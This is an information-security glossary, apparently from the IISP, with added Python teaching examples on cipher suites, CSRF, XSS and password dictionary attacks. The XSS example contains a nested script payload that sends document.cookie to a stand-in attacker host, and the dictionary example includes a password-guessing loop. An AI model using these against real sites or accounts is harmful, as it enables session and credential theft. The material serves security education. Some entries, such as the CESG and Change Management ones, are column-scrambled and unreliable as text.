Availability: Property of being accessible and usable upon demand by an authorized entity. [Source: ISO/IEC 27000:2016]

Backdoor: Malicious code inserted into a program for the purposes of providing the author covert access to machines running the program. [Source: OWASP]

Big Data: Data sets that are so large or complex that traditional data processing applications are inadequate to deal with them.

Biometrics: The application of statistical analysis to biological data. [Source: Oxford English Dictionary]

Black Box Testing: Black box testing is when the information about the organisation is not available to the testers. The tester performs the attack with no prior knowledge of the infrastructure, defence mechanisms and communication channels of the target organisation.

Blacklist: A list of people or groups seen as unacceptable or untrustworthy. [Source: Oxford English Dictionary]

Bot: Small, hidden programs that are often controlled by a malicious hacker. Bots can be installed on your PC without you knowing. Bots on a large number of PCs can be connected to form a botnet. Also known as a web bot.

Botnet: When multiple copies of a bot are installed on many PCs and controlled by a malicious hacker. The malicious hacker can use a botnet for large attacks (such as DDoS attacks or " floods") that wouldn't be possible if they used just one PC.

Bring Your Own Device: Bring Your Own Device (BYOD) refers to the policy of permitting employees to bring personally owned devices (for example laptops, tablets, and smart phones) to their workplace, and to use those devices to access privileged company information and applications. This includes using the devices when working remotely.

Brute Force Attack: An attack on an encryption algorithm where the encryption key for a ciphertext is determined by trying to decrypt with every key until valid plaintext is obtained. [Source: OWASP]
Business Continuity: Strategic and tactical capability of the organisation to plan for and respond to incidents and business disruptions in order to continue business operations at an acceptable predefined level. [Source: ISO 22313:2012]

Business Continuity Management: Holistic management process that identifies potential threats to an organization and the impacts to business operations that those threats, if realized, might cause, and which provides a framework for building organizational resilience with the capability for an effective response that safeguards the interests of its key stakeholders, reputation, brand and value-creating activities. [Source: ISO 22313:2012]

Business Continuity Plan: Documented procedures that guide organizations to respond, recover, resume, and restore to a pre-defined level of operation following disruption. [Source: ISO 22313:2012]

Business Impact: The business impact upon the organisation that might result from possible or actual information security incidents should be assessed, taking into account the consequences of a breach of information security such as loss of confidentiality, integrity or availability of the assets. [Source: ISO/IEC 27005:2011]

Business Impact Analysis: Business Impact Analysis (BIA) is a systematic process to determine and evaluate the potential effects of an interruption to critical business operations. Also referred to as a Business Impact Assessment.

CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA). A type of challenge-response test intended to distinguish human from machine input. An example is the site request for web site users to recognise and type a phrase posted using various challenging-to-read fonts, including images of text strings.

Cardholder Data: At a minimum, cardholder data consists of the full PAN. Cardholder data may also appear in the form of the full PAN plus any of the following: cardholder name, expiration date and/or service code. See Sensitive Authentication Data for additional data elements that may be transmitted or processed (but not stored) as part of a payment transaction. [Source: PCI DSS]

Center for Internet Security: The Center for Internet Security (CIS) is an organisation dedicated to enhancing the cybersecurity readiness and response among public and private sector entities. Utilizing its strong industry and government partnerships, CIS combats evolving cybersecurity challenges on a global scale and helps organisations adopt key best practices to achieve immediate and effective defences against cyber attacks. CIS is home to the Multi-State Information Sharing and Analysis Center (MS-ISAC), CIS Security Benchmarks, and CIS Critical Security Controls.

CERT: Computer emergency response teams (CERT) are expert groups that handle computer security incidents. Many CERT teams send out alerts to customers. Alternative names for such groups include computer emergency readiness team and computer security incident response team (CSIRT).

Certificate Authorizing Schemes: An arrangement between a number of countries to ensure that evaluations of products against the Common Criteria are performed to high and consistent standards and are seen to contribute significantly to confidence in the security of those products.

Certification Authority: Authority trusted by one or more users to create and assign public key certificates. [Source: ISO/IEC 27033-1:2009]
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
CESG Assisted CAPS (CESG Assisted Products Service). A scheme run by NCSC
Products certifying high grade cryptography products protecting the most
Service sensitive information of HMG. The scheme is also used by NCSC to
accelerate the development of high-grade products.
CESG Tailored CESG Tailored Assurance Service (CTAS) primary purpose is to
Assurance provide a tailored approach to gaining assurance in the specific
Service implementation of a product, system or service that a particular
HMG organisation wishes to use.
Chain of See Continuity of Evidence
Custody
Change Change Management (CM) sometimes referred to as Change
Management Control) is a formal process used to ensure that changes to a
product or system are introduced in a controlled and coordinated
manner. It reduces the possibility that unnecessary changes will be
introduced to a system without detailed consideration, introducing
faults into the system or undoing changes made by other users of
software and potentially having unintended consequences
CHECK Scheme The CHECK scheme enables penetration testing by NCSC approved
companies, employing penetration testing personnel qualified to
assess IT systems for HMG and other public sector bodies.
This can only be mandated for HMG national security requirements.
Chief The Chief Information Security Officer (CISO) is the senior-level
Information executive within an organisation responsible for establishing and
Security Officer maintaining the enterprise vision, strategy, and program to ensure
information assets and technologies are adequately protected.
Cipher An algorithm for performing encryption or decryption
Cipher Suite The collection of cryptographic algorithms used in TLS and SSL.
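To make "the collection of algorithms" concrete, the following added example (not part of the IISP text) splits a cipher-suite name into its components and applies a few review heuristics. The naming conventions are those of the IANA TLS Cipher Suite registry (TLS 1.2-style names containing `_WITH_`, and the short TLS 1.3 names of RFC 8446); the rules in `weaknesses()` are this example's own choices, not a published standard.

```python
"""Pull a TLS cipher-suite name apart into the algorithms it bundles.

Added example, not from the IISP text. Naming follows the IANA TLS Cipher
Suite registry (TLS 1.2-style names with _WITH_, and the short TLS 1.3 names
of RFC 8446); the weakness rules in weaknesses() are this example's own
review heuristics, not a standard.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

KEY_EXCHANGE = {"RSA", "DH", "DHE", "ECDH", "ECDHE", "PSK", "SRP_SHA", "NULL"}
AUTHENTICATION = {"RSA", "DSS", "ECDSA", "PSK", "anon", "NULL"}
_HASH_SUFFIX = re.compile(r"_(SHA256|SHA384|SHA|MD5)$")


@dataclass(frozen=True)
class CipherSuite:
    name: str
    key_exchange: Optional[str]    # None for TLS 1.3 (negotiated via supported_groups)
    authentication: Optional[str]  # None for TLS 1.3 (negotiated via signature_algorithms)
    cipher: str                    # bulk cipher, e.g. AES_128_GCM or 3DES_EDE_CBC
    mac_or_hash: str               # HMAC hash for CBC/stream suites, PRF/KDF hash for AEAD
    aead: bool                     # authenticated encryption (GCM, CCM, ChaCha20-Poly1305)


def _split_kx_auth(token: str) -> Tuple[str, str]:
    """'ECDHE_RSA' -> ('ECDHE', 'RSA'); a bare 'RSA' or 'PSK' both transports and authenticates."""
    if "_" in token:
        kx, auth = token.rsplit("_", 1)
        if kx in KEY_EXCHANGE and auth in AUTHENTICATION:
            return kx, auth
    if token in KEY_EXCHANGE and token in AUTHENTICATION:
        return token, token
    raise ValueError(f"unrecognised key-exchange/authentication token: {token}")


def parse_cipher_suite(name: str) -> CipherSuite:
    if not name.startswith("TLS_"):
        raise ValueError(f"not a TLS cipher suite name: {name}")
    body = name[len("TLS_"):]
    m = _HASH_SUFFIX.search(body)
    if m:
        mac_or_hash, body = m.group(1), body[: m.start()]
    else:
        mac_or_hash = "SHA256"  # *_CCM_8 suites omit the hash; the TLS 1.2 default PRF is SHA-256
    if "_WITH_" not in body:
        # TLS 1.3 names carry only the AEAD cipher and the HKDF hash
        return CipherSuite(name, None, None, body, mac_or_hash, True)
    kx_auth, cipher = body.split("_WITH_", 1)
    if kx_auth.endswith("_EXPORT"):  # 1990s export-grade suites, e.g. TLS_RSA_EXPORT_WITH_RC4_40_MD5
        kx_auth = kx_auth[: -len("_EXPORT")]
    kx, auth = _split_kx_auth(kx_auth)
    aead = any(tag in cipher for tag in ("GCM", "CCM", "POLY1305"))
    return CipherSuite(name, kx, auth, cipher, mac_or_hash, aead)


def weaknesses(suite: CipherSuite) -> List[str]:
    """Reasons a configuration review would reject the suite; an empty list means nothing flagged."""
    reasons = []
    if suite.authentication in ("anon", "NULL"):
        reasons.append("no peer authentication")
    if suite.key_exchange in ("RSA", "DH", "ECDH") and suite.authentication != "anon":
        reasons.append("static key exchange: no forward secrecy")
    if suite.cipher == "NULL" or suite.cipher.startswith(("RC4", "DES", "3DES")):
        reasons.append(f"weak or absent bulk cipher: {suite.cipher}")
    if "EXPORT" in suite.name:
        reasons.append("export-grade key length")
    if suite.mac_or_hash == "MD5":
        reasons.append("MD5-based MAC")
    if not suite.aead and suite.cipher != "NULL":
        reasons.append("non-AEAD construction (MAC-then-encrypt)")
    return reasons
```

`parse_cipher_suite("TLS_RSA_WITH_3DES_EDE_CBC_SHA")` yields RSA key transport (no forward secrecy), 3DES in CBC mode and an HMAC-SHA1 MAC, and `weaknesses()` flags all three; `TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256` passes clean.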
Ciphertext: Data in its encrypted form. (Source: NIST SP 800-175A)

Cloud Access Security Broker: A software tool or service, either on-premises or cloud-hosted, that sits between an organisation's own infrastructure and a Cloud Provider's infrastructure. A CASB acts as a control point, allowing the organisation to extend the reach of its security policies beyond its own infrastructure. It provides compliance checking, threat protection and security for cloud services. Also known as a Cloud Security Gateway.

Cloud Auditor: A party that can conduct independent assessment of cloud services, information system operations, performance and security of the cloud implementation. (Source: NIST SP 500-292)

Cloud Broker: An entity that manages the use, performance and delivery of cloud services, and negotiates relationships between Cloud Providers and Cloud Consumers. (Source: NIST SP 500-292)

Cloud Carrier: An intermediary that provides connectivity and transport of cloud services from Cloud Providers to Cloud Consumers. (Source: NIST SP 500-292)
Cloud Computing: A model for enabling on-demand network access to a shared pool of configurable IT capabilities/resources (e.g. networks, servers, storage, applications and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. It allows users to access technology-based services from the network cloud without knowledge of, expertise with, or control over the technology infrastructure that supports them. This cloud model is composed of five essential characteristics (on-demand self-service, ubiquitous network access, location-independent resource pooling, rapid elasticity and measured service); three service delivery models (Software as a Service [SaaS], Platform as a Service [PaaS] and Infrastructure as a Service [IaaS]); and four deployment models (private cloud, community cloud, public cloud and hybrid cloud). Note: both the user's data and essential security services may reside in and be managed within the network cloud. (Source: NISTIR 7298)

Cloud Consumer: A person or organisation that maintains a business relationship with, and uses services from, Cloud Providers. (Source: NIST SP 500-292)

Cloud Provider: A person, organisation or entity responsible for making a service available to interested parties. (Source: NIST SP 500-292)

Cloud Security Alliance: A not-for-profit organisation with a mission to "promote the use of best practices for providing security assurance within Cloud Computing, and to provide education on the uses of Cloud Computing to help secure all other forms of computing".

Cloud Subscriber: See Cloud Consumer. An entity that consumes services provided by a Cloud Provider; usually referred to simply as a Subscriber.

COBIT: A good-practice framework created by ISACA for IT management and IT governance. COBIT provides an implementable set of controls over information technology and organises them around a logical framework of IT-related processes.

Code Auditing: Reviewing computer software for security problems. (Source: OWASP)

Code Injection: The general term for attack types that consist of injecting code that is then interpreted or executed by the application. This type of attack exploits poor handling of untrusted data and is usually made possible by a lack of proper input validation and output encoding. The injected "code" is whatever the receiving interpreter understands: SQL for a database, shell syntax for a command line, HTML and JavaScript for a browser (see Cross-site Scripting).

Commercial Product Assurance: Commercial Product Assurance (CPA) is an NCSC approach to gaining confidence in the security of commercial products targeted at the HMG market. CPA-certified products are also recognised within the EU and NATO.

Common Criteria: The Common Criteria for Information Technology Security Evaluation (Common Criteria or CC) is an international standard (ISO/IEC 15408) for computer security certification. Security functional and assurance requirements are specified for a class of products in a Protection Profile and for a particular product in its Security Target; the depth of evaluation is expressed as an Evaluation Assurance Level (see Evaluation Assurance Level and Certificate Authorizing Schemes).

Common Vulnerabilities and Exposures: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures. Each entry is given an identifier of the form CVE-YYYY-NNNN so that tools, advisories and vulnerability databases can refer to the same issue unambiguously. CVE and the CVE logo are registered trademarks of The MITRE Corporation.

Common Vulnerability Scoring System: The Common Vulnerability Scoring System (CVSS) is an open framework for communicating the characteristics and severity of software vulnerabilities. A base score from 0.0 to 10.0 is derived from the vulnerability's exploitability (for example attack vector and privileges required) and its impact on confidentiality, integrity and availability; temporal and environmental metrics adjust that score for a given time and deployment. A CVSS score measures severity, not the risk to a particular organisation, so it should inform rather than replace prioritisation.
Common Weakness Enumeration: Common Weakness Enumeration (CWE) is a software community project that maintains a catalogue of common software weakness types. Unlike CVE, which lists specific vulnerability instances in particular products, CWE describes the underlying classes of flaw (buffer overflow, SQL injection, missing authorisation and so on). The goal of the project is to better understand flaws in software and to enable automated tools that can identify, fix and prevent them.

Communication Port: In the Internet protocol suite, a port is a 16-bit number that identifies an endpoint of communication within a host, distinguishing a specific process or type of network service. A port is always associated with an IP address and a transport protocol (TCP or UDP); the three together identify a socket. Well-known port numbers are assigned by IANA, for instance 80 for HTTP and 443 for HTTPS, but a service can listen on any port, so the port number alone is not proof of which protocol is being carried.

Communications Data: "communications data" means any of the following:
(a) any traffic data comprised in or attached to a communication (whether by the sender or otherwise) for the purposes of any postal service or telecommunication system by means of which it is being or may be transmitted;
(b) any information which includes none of the contents of a communication (apart from any information falling within paragraph (a)) and is about the use made by any person (i) of any postal service or telecommunications service; or (ii) in connection with the provision to or use by any person of any telecommunications service, of any part of a telecommunication system;
(c) any information not falling within paragraph (a) or (b) that is held or obtained, in relation to persons to whom he provides the service, by a person providing a postal service or telecommunications service.
(Source: Regulation of Investigatory Powers Act)

Community Cloud: The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organisations that have shared concerns (e.g. mission, security requirements, policy and compliance considerations). It may be owned, managed and operated by one or more of the organisations in the community, a third party, or some combination of them, and it may exist on or off premises. (Source: NIST SP 800-145)

Companies Act: The Companies Act 2006 is an Act of the Parliament of the United Kingdom which forms the primary source of UK company law.

Compartmentalise: Separating a system into parts with distinct boundaries, using simple, well-defined interfaces. The basic idea is containment: if one part is compromised, the extent of the damage can be limited. A security design principle. (Source: OWASP)

Compliance Audit: A comprehensive review of an organisation's adherence to regulatory guidelines. Independent accounting, security or IT consultants evaluate the strength and thoroughness of compliance preparations. Auditors review security policies, user access controls and risk management procedures over the course of a compliance audit.

Compliance Monitoring: Ensuring that security controls required by legislation, directives, policies, regulations, standards or procedures are implemented.

Computer Misuse Act: The Computer Misuse Act 1990 is an Act of the Parliament of the United Kingdom designed to protect computers against malicious attacks and theft of information. Its main offences are unauthorised access to computer material (section 1); unauthorised access with intent to commit or facilitate further offences (section 2); unauthorised acts with intent to impair the operation of a computer, which covers spreading malware and denial of service (section 3); unauthorised acts causing, or creating a risk of, serious damage (section 3ZA, added in 2015); and making, supplying or obtaining articles for use in these offences (section 3A). Penetration testers rely on documented, written authorisation from the system owner to stay outside section 1.
Computer Security Incident Response Team: Team of appropriately skilled and trusted members of the organisation that handles incidents during their lifecycle. A CSIRT is also known as a CERT. (Source: ISO/IEC 27035-1:2016)

Confidentiality: Property that information is not made available or disclosed to unauthorised individuals, entities or processes. (Source: ISO/IEC 27000:2016)

Consequence: Outcome of an event affecting objectives. (Source: ISO/IEC 27000:2016)

Content Control: Controls used to block content entering or leaving an organisation where that content does not conform to the corporate policy.

Continuity of Evidence: The witnessed, written record of all of the individuals who maintain unbroken control over items of physical or electronic evidence. It establishes proof that the items of evidence collected at the scene are the same evidence being presented in a court of law. Also referred to as Chain of Custody or Chain of Evidence. For digital evidence the record is normally paired with a cryptographic hash of each image or file taken at acquisition, so that any later alteration is detectable as well as documented.

Control: A measure that is modifying risk. Security controls are also referred to as safeguards or countermeasures. Controls include any process, policy, device, practice or other action which modifies risk. Controls may not always exert the intended or assumed modifying effect. (Source: ISO Guide 73:2009)
Cross-site Request Forgery: CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. With a little help from social engineering (such as sending a link via email or chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end-user data and operations in the case of a normal user; if the targeted end user is an administrator account, it can compromise the entire web application. The attack works because the browser attaches the victim's session cookie to any request aimed at the site, whichever page the request originates from. The standard defences are an anti-CSRF token that the attacker's page cannot read, the SameSite cookie attribute, and checking the Origin (or Referer) header. (Source: OWASP)
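The following added example (not from the IISP text or OWASP) shows the attack and the synchroniser-token defence side by side. A request is modelled as a plain dict with `cookies`, `headers` and `form` keys; the session table, the site origin `https://bank.example`, the attacker origin and the server key are all constructed for the demo.

```python
"""Synchroniser-token defence against CSRF, shown beside the unprotected handler.

Added example, not from the IISP text or OWASP. A request is modelled as a
plain dict (keys: cookies, headers, form); the session table, site origin
and server key are constructed for the demo.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

SITE_ORIGIN = "https://bank.example"          # constructed
SESSIONS = {"sess-abc": "alice"}              # constructed session-id -> user table
_SERVER_KEY = secrets.token_bytes(32)         # assumption: one long-lived key per deployment


def issue_csrf_token(session_id: str, action: str) -> str:
    """HMAC(server key, session || action): bound to the session and the form it protects,
    so it needs no server-side storage and cannot be replayed for another user or action."""
    msg = f"{session_id}\x00{action}".encode()
    return hmac.new(_SERVER_KEY, msg, hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, action: str, presented: Optional[str]) -> bool:
    if not presented:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id, action), presented)


def transfer_vulnerable(request: Dict) -> str:
    """Trusts the session cookie alone: the browser attaches it to a cross-site form post too."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return "401 not logged in"
    return f"200 {user} sent {request['form']['amount']} to {request['form']['to']}"


def transfer_hardened(request: Dict) -> str:
    sid = request["cookies"].get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return "401 not logged in"
    # Origin is set by the browser and cannot be altered by page script; reject a foreign one.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request rejected"
    # Origin may be absent, so the token check is the one that must always run.
    if not csrf_token_valid(sid, "transfer", request["form"].get("csrf_token")):
        return "403 missing or invalid CSRF token"
    return f"200 {user} sent {request['form']['amount']} to {request['form']['to']}"


def forged_request(origin: Optional[str] = "https://attacker.example") -> Dict:
    """What an auto-submitting form on attacker.example produces: the victim's cookie rides
    along, but the attacker cannot read the token that bank.example embedded in its own page."""
    headers = {} if origin is None else {"Origin": origin}
    return {"cookies": {"session": "sess-abc"}, "headers": headers,
            "form": {"amount": "1000", "to": "mallory", "csrf_token": "guess"}}


def legitimate_request() -> Dict:
    return {"cookies": {"session": "sess-abc"}, "headers": {"Origin": SITE_ORIGIN},
            "form": {"amount": "50", "to": "bob",
                     "csrf_token": issue_csrf_token("sess-abc", "transfer")}}
```

The forged request succeeds against `transfer_vulnerable` and is refused by `transfer_hardened` whether or not the Origin header is present; binding the token to both session and action means a token harvested from one form cannot be replayed against another.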
Cross-site Scripting: A class of problems resulting from insufficient input validation and output encoding, where one user can add content to a web site that is malicious when viewed by other users of the site. For example, one might post to a message board that accepts arbitrary HTML and include a malicious script. A type of code injection attack: the injected script runs in each viewer's browser with that viewer's session, so it can read cookies, forge requests and rewrite the page. (Source: OWASP)
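The message-board scenario above, as an added example (not from the IISP text or OWASP): a vulnerable renderer, a tag-blacklist "fix" that a nested payload defeats, and the output-encoding fix. The render functions and the attacker's post are constructed for the demo; `html.escape` is Python's standard HTML-context encoder, and `contains_active_content` is a small checker written here to make the result testable, not a real XSS scanner.

```python
"""Stored XSS in a message board, with a failed blacklist and output encoding beside it.

Added example, not from the IISP text or OWASP. The render functions and the
post payload are constructed for the demo; html.escape is Python's standard
HTML-context encoder.
"""
import html
import re

# Constructed attacker post: the tag names are split so that removing one
# "<script>" / "</script>" re-forms a working pair.
ATTACKER_POST = ("<scr<script>ipt>fetch('https://attacker.example/?c='+document.cookie)"
                 "</scr</script>ipt>")

_ACTIVE_MARKUP = re.compile(r"<\s*(script\b|\w+[^>]*(\bon\w+\s*=|javascript:))", re.I)


def contains_active_content(fragment: str) -> bool:
    """True if the rendered HTML still carries a live tag: <script>, an on* handler or a
    javascript: URL inside a tag. Escaped text such as '&lt;script&gt;' has no literal '<'
    and is therefore inert."""
    return _ACTIVE_MARKUP.search(fragment) is not None


def render_post_vulnerable(author: str, body: str) -> str:
    """Interpolates user content straight into the page: any HTML the poster wrote runs
    for every viewer."""
    return f"<div class='post'><b>{author}</b>: {body}</div>"


def render_post_blacklist(author: str, body: str) -> str:
    """Removing known-bad tags is not validation: one pass over a nested payload re-forms
    the tag it just deleted."""
    cleaned = re.sub(r"</?script>", "", body, flags=re.I)
    return f"<div class='post'><b>{author}</b>: {cleaned}</div>"


def render_post_hardened(author: str, body: str) -> str:
    """Encode for the HTML context at output time: '<', '>', '&' and quotes become entities,
    so the browser shows the poster's text but parses none of it as markup."""
    return (f"<div class='post'><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</div>")
```

Encoding is context-specific: `html.escape` is correct for HTML body and attribute values, but data placed inside a script block, a URL or a CSS property needs that context's encoder instead, which is why frameworks provide contextual auto-escaping rather than one global filter.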
Cryptanalysis: The study of ciphers, ciphertext or cryptosystems with a view to finding weaknesses in them that will permit retrieval of the plaintext from the ciphertext, without necessarily knowing the key or the algorithm.

Cryptographic Algorithm: A well-defined computational procedure that takes variable inputs, including a cryptographic key (if applicable), and produces an output. (Source: NIST SP 800-175B)

Cryptographic Hash Function: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties:
1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and
2. (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.
(Source: NIST SP 800-175B)
MD5 and SHA-1 no longer meet the collision-resistance property and are not approved for digital signatures or certificates. A bare hash, however strong, is also the wrong tool for storing passwords, which need a salted and deliberately slow construction (see Dictionary Attack).

Cryptographic Module Validation Program: A joint US and Canadian programme, run by NIST and CSE, that validates cryptographic modules against FIPS 140-2. The programme is available to any vendor who seeks to have a product certified for use by the U.S. Government and by regulated industries (such as financial and health-care institutions) that collect, store, transfer, share and disseminate "sensitive, but not classified" information.

Cryptography: The science of information hiding and verification. It includes the protocols, algorithms and methodologies to securely and consistently prevent unauthorised access to sensitive information and enable verifiability of the information. The main goals include confidentiality, integrity authentication and source authentication. (Source: NIST SP 800-175A)

Cyber Attack: An attack, via cyberspace, targeting an enterprise's use of cyberspace for the purpose of disrupting, disabling, destroying or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information. (Source: NISTIR 7298)

Cyber Resilience: Brings together the areas of information security, business continuity and organisational resilience. The objective of cyber resilience is to maintain the organisation's ability to deliver services and intended outcomes despite adverse cyber events. Adverse cyber events are those that negatively impact the availability, integrity or confidentiality of IT systems and their associated data and services.
Cyber Scheme: A not-for-profit organisation run by an independent Board of Directors. The aim of the Cyber Scheme is to provide, via training and associated progressive qualifications, a range of professional capabilities in the areas of penetration testing, forensics, malware analysis, risk assessment, risk management and related cyber security capabilities.

Cyber Security: The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorised access in cyberspace.

Cyberspace: A global domain within the information environment consisting of the interdependent network of information systems infrastructures including the Internet, telecommunications networks, computer systems, and embedded processors and controllers. (Source: NISTIR 7298)

Data at Rest: Inactive data that is stored physically in any digital form (e.g. databases, data warehouses, spreadsheets, archives, tapes, off-site backups, mobile devices). Contrast with data in transit (crossing a network) and data in use (held in memory by a running process); each state calls for its own controls.

Data Controller: A person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal data are, or are to be, processed. A data controller must be a "person" recognised in law, that is to say: individuals; organisations; and other corporate and unincorporated bodies of persons. (Source: Data Protection Act)

Data Flow Diagram: A graphical representation of the "flow" of data through an information system, modelling its process aspects. A Data Flow Diagram shows what kind of information will be input to and output from the system, where the data will come from and go to, and where the data will be stored. In threat modelling the diagram is annotated with trust boundaries, and each flow that crosses a boundary is examined for the threats that apply to it.

Data Loss Prevention: A set of controls used to make sure that end users do not send sensitive or critical information outside the corporate network, typically by inspecting content at endpoints, mail gateways, web proxies and storage and applying policy to what is found.

Data Processor: "data processor", in relation to personal data, means any person (other than an employee of the data controller) who processes the data on behalf of the data controller. (Source: Data Protection Act)

Data Protection: Defines how personal or customer information is used and controlled by organisations or government bodies. Data protection laws include strict guidelines and privacy policies on how to keep information safe.

Data Protection Act: The Data Protection Act 1998 is an Act of the UK Parliament defining the ways in which information about living people may be legally used and handled; it implemented EU Directive 95/46/EC in the UK. The main intent is to protect individuals against misuse or abuse of information about them.

Data Protection Impact Assessment: A process which helps an organisation to identify and reduce the privacy risks of a project. An effective Data Protection Impact Assessment (DPIA) is used throughout the development and implementation of a project, using existing project management processes. This is the term used in the GDPR. Also known as a Privacy Impact Assessment.

Data Protection Officer: The Data Protection Officer (DPO) is the person designated to take responsibility for data protection compliance within an organisation.
Data Subject: "Data subject" means an individual who is the subject of personal data. (Source: Data Protection Act)

Decryption: The process of transforming ciphertext into plaintext for the purpose of reading the information.

Deep Content Inspection: A form of filtering that examines an entire file or MIME object as it passes an inspection point, searching for viruses, spam, data loss, key words or other content-level criteria.

Defence in Depth: A principle for building systems stating that multiple defensive mechanisms at different layers of a system are usually more secure than a single layer of defence. For example, when performing input validation, one might validate user data as it comes in and then also validate it before each use, just in case something was not caught, or the underlying components are linked against a different front end. (Source: OWASP)

Demilitarized Zone: Perimeter network (also known as a screened subnet) inserted as a "neutral zone" between networks. (Source: ISO/IEC 27033-1:2009)

Denial of Service: Prevention of authorised access to a system resource or the delaying of system operations and functions, with resultant loss of availability to authorised users. (Source: ISO/IEC 27033-1:2009)

Design Pattern: A general reusable solution to a commonly occurring problem within a given context. There are a number of different types of patterns, including software and architectural. Sometimes design patterns are referred to as design templates.

Detective Control: A security control used to identify and characterise an information security incident.

Deterrent Control: A security control used to reduce the likelihood of an attack.

Device Control: Protects against data loss by monitoring and controlling data transfers from PCs to removable storage devices such as USB drives.
Dictionary Attack: An attack that tries candidate values from a precomputed list (a "dictionary") rather than searching the whole key or password space. Against a cryptosystem, the attacker precomputes the ciphertext of a frequently occurring plaintext under many keys and looks a captured ciphertext up in that table; a large enough key space makes the table infeasible to build. Against a password system the dictionary is a list of likely passwords, which is far smaller than the space of all strings, so the key-space argument does not help. A per-password random salt stops the attacker reusing one precomputed table (including rainbow tables) across many accounts, but once the salt is known a "Crack"-style dictionary attack against that single account still works. Such attacks are made more expensive by making the password verifier computationally costly (a password-based key derivation function such as PBKDF2, bcrypt, scrypt or Argon2), by choosing strong random passwords, or by not relying on a password-based system at all. (Source: based on OWASP)
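The following added example (not from the IISP text or OWASP) runs the three cases above against a constructed wordlist: a precomputed table that cracks an unsalted SHA-256 store with one lookup, a salted PBKDF2 store where the table is useless, and the per-account "Crack"-style attack that still works once the salt is known but now pays one full key derivation per guess. PBKDF2-HMAC-SHA256 from `hashlib` stands in for any password-hashing KDF; the iteration count is the cost knob.

```python
"""Dictionary attack against unsalted hashes versus salted, slow verifiers.

Added example, not from the IISP text or OWASP. The wordlist and the
iteration counts are constructed for the demo; PBKDF2-HMAC-SHA256 from
hashlib stands in for any password-hashing KDF (bcrypt, scrypt and Argon2
are the usual choices in practice).
"""
import hashlib
import hmac
import math
import os
from typing import Dict, Optional, Tuple

# Constructed stand-in for a leaked-password wordlist.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2017!", "dragon"]


def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def build_table(words) -> Dict[str, str]:
    """Precomputed dictionary hash -> plaintext: built once, reused against every unsalted store."""
    return {unsalted_hash(w): w for w in words}


def lookup(table: Dict[str, str], stored_hash: str) -> Optional[str]:
    """One dictionary lookup recovers the password; no hashing at attack time."""
    return table.get(stored_hash)


def salted_record(password: str, iterations: int = 100_000) -> Dict:
    """Store a fresh random salt and a deliberately slow derived key, not the password
    or a bare hash."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": dk}


def verify_salted(record: Dict, candidate: str) -> bool:
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["hash"])   # constant-time comparison


def dictionary_attack(record: Dict, words) -> Tuple[Optional[str], int]:
    """'Crack'-style attack once the salt is known: every guess costs one full KDF run,
    and nothing computed here transfers to another account with a different salt.
    Returns (password or None, number of KDF runs spent)."""
    for guesses, word in enumerate(words, start=1):
        if verify_salted(record, word):
            return word, guesses
    return None, len(words)


def guessing_entropy_bits(wordlist_size: int) -> float:
    """A password drawn from a list of N words has at most log2(N) bits of guessing entropy
    however long it is: 'Summer2017!' is one guess, not eleven characters of randomness."""
    return math.log2(wordlist_size)
```

Two records of the same password have different salts and therefore different hashes, which is exactly what defeats the shared table; the slow verifier does not stop the per-account attack, it only multiplies its cost by the iteration count.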
Digital Evidence: Digital evidence is information stored or transmitted in binary form that may be relied on in court. It can be found on a computer hard drive, a mobile phone, a personal digital assistant (PDA), a CD and a flash card in a digital camera, among other places.

Digital Forensics: A branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime.

Digital Signature: The result of a cryptographic transformation of data that, when properly implemented, provides the services of:
1. Source authentication,
2. Data integrity, and
3. Support for signer non-repudiation.
(Source: NIST SP 800-175B)
Typically implemented with a public-key algorithm (such as RSA or ECDSA) applied to a hash of the data: the private key signs, and anyone holding the public key can verify. Non-repudiation therefore depends on the private key having stayed under the signer's sole control.
Disaster Recovery: A set of policies and procedures to enable the recovery or continuation of technology infrastructure and systems following a natural or human-induced disaster. Disaster recovery focuses on the IT or technology systems supporting critical business functions, as opposed to business continuity, which involves keeping all essential aspects of a business functioning despite significant disruptive events. Disaster recovery is therefore a subset of business continuity.

Discretionary Access Control: A means of restricting access to objects (e.g. files, data entities) based on the identity and need-to-know of subjects (e.g. users, processes) and/or the groups to which the subject belongs. The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject (unless restrained by mandatory access control). (Source: NISTIR 7298)

